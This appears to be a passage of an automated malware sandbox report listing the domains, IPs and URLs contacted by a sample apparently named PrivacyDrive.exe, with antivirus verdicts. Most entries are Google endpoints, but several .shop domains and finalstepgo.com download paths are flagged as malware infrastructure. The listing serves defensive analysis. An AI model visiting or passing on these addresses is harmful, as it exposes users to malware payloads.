https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/ck=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/ujg=1/rs=ACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sya4,syb0,syap,sy9r,sy9q,sych,sybz,syc0,syc6,syan,syb8,syc5,syby,sybr,sybq,syae,syal,syc1,sybm,sybj,sybi,sybk,syad,syb6,sybd,sybb,sybf,sybc,sybe,sya8,syb3,sycq,syd5,sycr,syd6,sya6,syb2,sya9,syb4,sya5,syb1,syao,syaa,sycp,syce,syca,sycb,sy9u,sy9y,sy9v,sy9z,sy9w,sy9o,sy9l,sy9n,sya3,syc2,syg2,sygb,syg7,syg5,sy7y,sy7v,sy7x,syg4,syg9,syg3,syg1,syfy,syfx,sy81,uxMpU,syft,syd0,sycy,sycs,syd7,sycu,syct,sybg,sycw,sycn,sy8x,sy8w,sy8v,Mlhmy,QGR0gd,aurFic,sy96,fKUV3e,OTA3Ae,sy8g,OmgaI,EEDORb,PoEs9b,Pjplud,sy8r,sy8k,A1yn5d,YIZmRd,uY49fb,sy7s,sy7q,sy7r,sy7p,sy7o,byfTOb,lsjVmc,LEikZe,kWgXee,Ug7Xab,U0aPgd,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy1d2,sy1cz,syzi,syt6,d5EhJe,sy1di,fCxEDd,sywo,sy1dh,sy1dg,sy1df,sy1db,sy1d6,sy1d8,sy1d7,sy1da,sy1am,sy1af,sy17w,sywn,syz4,syz3,T1HOxc,sy1d9,sy1d5,zx30Y,sy1dj,sy1dd,sy192,Wo3n8,syv0,loL8vb,syv4,syv3,syv2,ms4mZb,syq8,B2qlPe,syw2,NzU6V,sy117,sywi,zGLm3b,syxw,syxx,syxo,DhPYme,MpJwZc,UUJqVe,sy7l,sOXFj,sy7k,s39S4,oGtAuc,NTMZac,nAFL3,sy8d,sy8c,q0xTif,y05UD,sy14x,sy1ce,sy1c8,syz2,sy1c0,sy16f,syz1,syz0,syyz,syz5,sy1c7,sy167,sy1bw,sy16c,sy1c6,sy14s,sy1c1,sy1bx,sy16d,sy16e,sy1c9,sy14h,sy1c5,sy1c4,sy1c2,syno,sy1c3,sy1cb,sy1bq,sy1by,sy1bp,sy1bv,sy1br,sy17a,sy1bz,sy1bl,sy16h,sy16i,syz7,syz8,epYOx?xjs=s3	0%	Avira URL Cloud	safe
http://www.google.com/doodles/celebrating-popcorn?hl=en	0%	Avira URL Cloud	safe
https://www.google.com"	0%	Avira URL Cloud	safe
https://ogs.google.com/widget/callout?prid=19037050	0%	Avira URL Cloud	safe
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=promo&rt=hpbas.5245&zx=1727366128120&opi=89978449	0%	Avira URL Cloud	safe
https://www.thawte.com/repository0W	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
google.com	216.58.206.78	true	false	unknown
csp.withgoogle.com	142.250.184.241	true	false	unknown
www3.l.google.com	142.250.184.206	true	false	unknown
plus.l.google.com	142.250.186.174	true	false	unknown
play.google.com	142.250.185.238	true	false	unknown
www.google.com	172.217.16.132	true	false	unknown
racedsuitreow.shop	172.67.206.221	true	true	unknown
finalstepgo.com	185.255.122.133	true	true	unknown
ogs.google.com	unknown	unknown	true	unknown
apis.google.com	unknown	unknown	true	unknown
candleduseiwo.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/gen_204?atyp=i&ei=64P1ZseiHfKwi-gPg-6IsAw&dt19=2&prm23=0&zx=1727366128125&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com/xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=1/ed=1/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png	false	Avira URL Cloud: safe	unknown
https://www.google.com/xjs/_/js/md=2/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA	false	Avira URL Cloud: safe	unknown
abortinoiwiam.shop	true	Avira URL Cloud: malware	unknown
https://www.google.com/complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=64P1ZseiHfKwi-gPg-6IsAw.1727366125395&dpr=1&nolsbt=1	false	Avira URL Cloud: safe	unknown
https://www.google.com/client_204?atyp=i&biw=1280&bih=907&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449	false	Avira URL Cloud: safe	unknown
defenddsouneuw.shop	true	Avira URL Cloud: malware	unknown
https://www.google.com/xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=0/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=syjv,syo3?xjs=s4	false	Avira URL Cloud: safe	unknown
priooozekw.shop	true	Avira URL Cloud: malware	unknown
surroundeocw.shop	true	Avira URL Cloud: malware	unknown
https://www.google.com/logos/doodles/2024/popcorn/rc4/popcorn.js	false	Avira URL Cloud: safe	unknown
https://www.google.com/gen_204?atyp=i&ei=64P1ZseiHfKwi-gPg-6IsAw&ct=slh&v=t1&im=M&m=HV&pv=0.9621399517689093&me=1:1727366123896,V,0,0,1280,907:0,B,907:0,N,1,64P1ZseiHfKwi-gPg-6IsAw:0,R,1,1,0,0,1280,907:4231,x:2883,G,1,1,395,514:2659,h,1,1,o:651,e,B&zx=1727366134321&opi=89978449	false	Avira URL Cloud: safe	unknown
candleduseiwo.shop	true	Avira URL Cloud: malware	unknown
https://www.google.com/logos/2024/popcorn/rc4/cta.png	false	Avira URL Cloud: safe	unknown
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=aLUfP?xjs=s4	false	Avira URL Cloud: safe	unknown
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=webhp&nt=navigate&t=fi&st=10053&fid=1&zx=1727366131013&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=webhp&t=all&imn=11&ima=1&imad=0&imac=1&wh=907&aftie=NF&aft=1&aftp=907&adh=&cls=0.000046949291965270124&ime=1&imeae=0&imeap=0&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=203802&ucb=203802&ts=204102&mem=ujhs.10,tjhs.14,jhsl.2173,dm.8&nv=ne.1,feid.bbb3d774-59be-491a-a995-04abadd6c81b&net=dl.1500,ect.3g,rtt.300&hp=&sys=hc.4&p=bs.true&rt=hst.35,cbt.97,prt.1023,afti.1476,aft.1476,aftqf.1477,xjses.2440,xjsee.2491,xjs.2491,lcp.1481,fcp.1017,wsrt.2066,cst.677,dnst.9,rqst.730,rspt.361,sslt.677,rqstt.1697,unt.1010,cstt.1020,dit.3112&zx=1727366125369&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4	false	Avira URL Cloud: safe	unknown
https://finalstepgo.com/uploads/il222.zip	false	Avira URL Cloud: malware	unknown
https://www.google.com/logos/2024/popcorn/rc4/messages.en.nocache.json	false	Avira URL Cloud: safe	unknown
https://www.google.com/gen_204?s=webhp&t=aft&atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&rt=wsrt.2066,aft.1476,afti.1476,cbt.97,hst.35,prt.1023&imn=11&ima=1&imad=0&imac=1&wh=907&aftie=NF&aft=1&aftp=907&opi=89978449&ts=204102	false	Avira URL Cloud: safe	unknown
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4	false	Avira URL Cloud: safe	unknown
https://www.google.com/gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=64P1ZseiHfKwi-gPg-6IsAw&zx=1727366130436&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com/logos/2024/popcorn/rc4/preload-sprite.png	false	Avira URL Cloud: safe	unknown
https://www.google.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://play.google.com/log?format=json&hasfast=true	false	Avira URL Cloud: safe	unknown
racedsuitreow.shop	true	Avira URL Cloud: malware	unknown
https://www.google.com/images/searchbox/desktop_searchbox_sprites318_hr.webp	false	Avira URL Cloud: safe	unknown
https://www.google.com/	false		unknown
https://csp.withgoogle.com/csp/gws/other-hp	false	Avira URL Cloud: safe	unknown
covvercilverow.shop	true	Avira URL Cloud: malware	unknown
pumpkinkwquo.shop	true	Avira URL Cloud: malware	unknown
https://www.google.com/gen_204?s=webhp&t=cap&atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&rt=wsrt.2066,cbt.97,hst.35&opi=89978449&ts=300	false	Avira URL Cloud: safe	unknown
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0	false	Avira URL Cloud: safe	unknown
https://www.google.com/logos/2024/popcorn/rc4/preload-bg-sprite.jpg	false	Avira URL Cloud: safe	unknown
deallyharvenw.shop	true	Avira URL Cloud: malware	unknown
https://racedsuitreow.shop/api	true	Avira URL Cloud: malware	unknown
https://finalstepgo.com/uploads/il2.txt	true	Avira URL Cloud: malware	unknown
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=promo&rt=hpbas.5245,hpbarr.1030&zx=1727366129148&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com/logos/2024/popcorn/rc4/google_frame_mask.png	false	Avira URL Cloud: safe	unknown
https://ogs.google.com/widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en	false	URL Reputation: safe	unknown
https://play.google.com/log?format=json&hasfast=true&authuser=0	false	Avira URL Cloud: safe	unknown
https://www.google.com/client_204?cs=1&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com/gen_204?atyp=csi&ei=8YP1Zq3GL5iK9u8P68momQ0&s=async&astyp=hpba&ima=0&imn=0&mem=ujhs.10,tjhs.14,jhsl.2173,dm.8&nv=ne.1,feid.bbb3d774-59be-491a-a995-04abadd6c81b&hp=&rt=ttfb.1024,st.1025,bs.27,aaft.1026,acrt.1026,art.1027&zx=1727366129148&opi=89978449	false	Avira URL Cloud: safe	unknown
https://google.com/	false	Avira URL Cloud: safe	unknown
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/ck=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/ujg=1/rs=ACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sya4,syb0,syap,sy9r,sy9q,sych,sybz,syc0,syc6,syan,syb8,syc5,syby,sybr,sybq,syae,syal,syc1,sybm,sybj,sybi,sybk,syad,syb6,sybd,sybb,sybf,sybc,sybe,sya8,syb3,sycq,syd5,sycr,syd6,sya6,syb2,sya9,syb4,sya5,syb1,syao,syaa,sycp,syce,syca,sycb,sy9u,sy9y,sy9v,sy9z,sy9w,sy9o,sy9l,sy9n,sya3,syc2,syg2,sygb,syg7,syg5,sy7y,sy7v,sy7x,syg4,syg9,syg3,syg1,syfy,syfx,sy81,uxMpU,syft,syd0,sycy,sycs,syd7,sycu,syct,sybg,sycw,sycn,sy8x,sy8w,sy8v,Mlhmy,QGR0gd,aurFic,sy96,fKUV3e,OTA3Ae,sy8g,OmgaI,EEDORb,PoEs9b,Pjplud,sy8r,sy8k,A1yn5d,YIZmRd,uY49fb,sy7s,sy7q,sy7r,sy7p,sy7o,byfTOb,lsjVmc,LEikZe,kWgXee,Ug7Xab,U0aPgd,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy1d2,sy1cz,syzi,syt6,d5EhJe,sy1di,fCxEDd,sywo,sy1dh,sy1dg,sy1df,sy1db,sy1d6,sy1d8,sy1d7,sy1da,sy1am,sy1af,sy17w,sywn,syz4,syz3,T1HOxc,sy1d9,sy1d5,zx30Y,sy1dj,sy1dd,sy192,Wo3n8,syv0,loL8vb,syv4,syv3,syv2,ms4mZb,syq8,B2qlPe,syw2,NzU6V,sy117,sywi,zGLm3b,syxw,syxx,syxo,DhPYme,MpJwZc,UUJqVe,sy7l,sOXFj,sy7k,s39S4,oGtAuc,NTMZac,nAFL3,sy8d,sy8c,q0xTif,y05UD,sy14x,sy1ce,sy1c8,syz2,sy1c0,sy16f,syz1,syz0,syyz,syz5,sy1c7,sy167,sy1bw,sy16c,sy1c6,sy14s,sy1c1,sy1bx,sy16d,sy16e,sy1c9,sy14h,sy1c5,sy1c4,sy1c2,syno,sy1c3,sy1cb,sy1bq,sy1by,sy1bp,sy1bv,sy1br,sy17a,sy1bz,sy1bl,sy16h,sy16i,syz7,syz8,epYOx?xjs=s3	false	Avira URL Cloud: safe	unknown
https://www.google.com/async/hpba?vet=10ahUKEwiHxL-h_OCIAxVy2AIHHQM3AsYQj-0KCBY..i&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC%2Fbr%3D1%2Frs%3DACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fck%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ,_fmt:prog,_id:_64P1ZseiHfKwi-gPg-6IsAw_8	false	Avira URL Cloud: safe	unknown
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=promo&rt=hpbas.5245&zx=1727366128120&opi=89978449	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521221341.000000000171B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ogs.google.com/	chromecache_234.1.dr	false	Avira URL Cloud: safe	unknown
http://www.broofa.com	chromecache_231.1.dr, chromecache_226.1.dr	false	URL Reputation: safe	unknown
https://ogs.google.com/widget/callout	chromecache_234.1.dr	false	Avira URL Cloud: safe	unknown
http://www.gphysics.com	chromecache_184.1.dr, chromecache_219.1.dr	false	Avira URL Cloud: safe	unknown
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1	chromecache_217.1.dr, chromecache_207.1.dr	false	URL Reputation: safe	unknown
https://www.google.com	chromecache_231.1.dr, chromecache_234.1.dr, chromecache_226.1.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/webhp	chromecache_219.1.dr	false	Avira URL Cloud: safe	unknown
https://racedsuitreow.shop/u	PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ogs.google.com/widget/callout?eom=1	chromecache_200.1.dr	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawtePremiumServerCA.crl0	PrivacyDrive.exe.15.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/tools/feedback	chromecache_238.1.dr, chromecache_221.1.dr	false	Avira URL Cloud: safe	unknown
https://apis.google.com/js/api.js	chromecache_225.1.dr, chromecache_220.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/_/og/promos/	chromecache_200.1.dr	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/cps0	PrivacyDrive.exe.15.dr	false	Avira URL Cloud: safe	unknown
https://plus.google.com	chromecache_207.1.dr	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521221341.000000000171B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://racedsuitreow.shop/	PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.cybertronsoft.com	PrivacyDrive.exe.15.dr	false	Avira URL Cloud: safe	unknown
https://issues.chromium.org/issues/40757070).	chromecache_200.1.dr	false	Avira URL Cloud: safe	unknown
https://fonts.google.com/license/googlerestricted	chromecache_227.1.dr	false	URL Reputation: safe	unknown
https://racedsuitreow.shop/api9	PrivacyDrive.exe, 00000010.00000002.1578947957.0000000001700000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://clients6.google.com	chromecache_217.1.dr, chromecache_207.1.dr	false	Avira URL Cloud: safe	unknown
https://use.typekit.net	chromecache_214.1.dr, chromecache_204.1.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/intl/en/about/products	chromecache_200.1.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/log?format=json&hasfast=true	chromecache_225.1.dr, chromecache_242.1.dr, chromecache_193.1.dr, chromecache_220.1.dr	false	Avira URL Cloud: safe	unknown
https://lens.google.com	chromecache_242.1.dr, chromecache_193.1.dr	false	Avira URL Cloud: safe	unknown
http://schema.org/WebPage	chromecache_200.1.dr	false	URL Reputation: safe	unknown
https://lens.google.com/gen204	chromecache_238.1.dr, chromecache_221.1.dr	false	Avira URL Cloud: safe	unknown
https://support.google.com/	chromecache_238.1.dr, chromecache_221.1.dr	false	URL Reputation: safe	unknown
http://www.google.com/doodles/_SHARE?description=	chromecache_184.1.dr, chromecache_219.1.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/url?q	chromecache_234.1.dr	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	PrivacyDrive.exe.15.dr	false	URL Reputation: safe	unknown
https://csp.withgoogle.com/csp/lcreport/	chromecache_242.1.dr, chromecache_217.1.dr, chromecache_207.1.dr, chromecache_193.1.dr	false	URL Reputation: safe	unknown
https://apis.google.com	chromecache_231.1.dr, chromecache_217.1.dr, chromecache_207.1.dr, chromecache_226.1.dr, chromecache_200.1.dr	false	URL Reputation: safe	unknown
https://domains.google.com/suggest/flow	chromecache_217.1.dr, chromecache_207.1.dr	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	chromecache_214.1.dr, chromecache_204.1.dr	false	Avira URL Cloud: safe	unknown
https://ogs.google.com/widget/app/so?eom=1	chromecache_200.1.dr	false	Avira URL Cloud: safe	unknown
https://support.google.com/websearch/answer/106230	chromecache_242.1.dr, chromecache_193.1.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	PrivacyDrive.exe.15.dr	false	URL Reputation: safe	unknown
http://www.privacy-drive.comx	PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr	false	Avira URL Cloud: safe	unknown
https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=	chromecache_225.1.dr, chromecache_242.1.dr, chromecache_193.1.dr, chromecache_220.1.dr	false	URL Reputation: safe	unknown
https://ogs.google.com/widget/callout?prid=19037050	chromecache_200.1.dr	false	Avira URL Cloud: safe	unknown
https://push.clients6.google.com/upload/	chromecache_238.1.dr, chromecache_221.1.dr	false	URL Reputation: safe	unknown
https://www.thawte.com/cps0/	PrivacyDrive.exe.15.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com"	chromecache_234.1.dr	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/repository0W	PrivacyDrive.exe.15.dr	false	Avira URL Cloud: safe	unknown
